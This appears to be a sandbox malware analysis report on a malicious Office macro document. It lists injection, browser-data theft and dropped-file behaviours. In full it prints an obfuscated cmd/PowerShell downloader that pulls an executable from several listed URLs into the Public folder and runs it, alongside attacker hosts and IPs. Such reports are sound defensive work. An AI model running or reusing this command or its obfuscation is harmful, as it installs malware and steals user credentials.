VTI Score | 100 / 100
VTI Database Version | 2.6
VTI Rule Match Count | 24
VTI Rule Type | Documents

Injection | Write into memory of a process running from a created or modified executable
"c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" modifies memory of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"

Injection | Modify control flow of a process running from a created or modified executable
"c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" alters context of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"

Process | Create process
Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host 
uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ".
Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
Create process "C:\Users\Public\3292.exe".
Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe".
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"".
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"".
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"".

Information Stealing | Read browser data
Possibly trying to read out browser credentials.

File System | Handle with malicious files
File "c:\users\public\3292.exe" is a known malicious file.

Network | Download data
URL "www.indpts.com/UHSD/".
URL "173.201.20.6".
URL "159.203.94.198".

Network | Perform DNS request
Resolve host name "www.indpts.com".

Browser | Read data related to browsing history
Read the browsing history for "Microsoft Internet Explorer".

Network | Connect to remote host
Outgoing TCP connection to host "108.163.227.35:80".

PE | Execute dropped PE file
Execute dropped file "c:\users\public\3292.exe".

Network | Connect to HTTP server
URL "173.201.20.6".
URL "159.203.94.198".
URL "www.indpts.com/UHSD/".

PE | Drop PE file
Drop file "c:\users\public\3292.exe".

VBA Macro | Execute application
VBA.Shell$ QiiPPcnDM, 0

Process | Create system object
Create mutex with name "Global\.net clr networking".
Create mutex with name "Global\I705BA84C".
Create mutex with name "Global\M705BA84C".

VBA Macro | Execute macro on specific worksheet event
Execute macro on "Activate Workbook" event.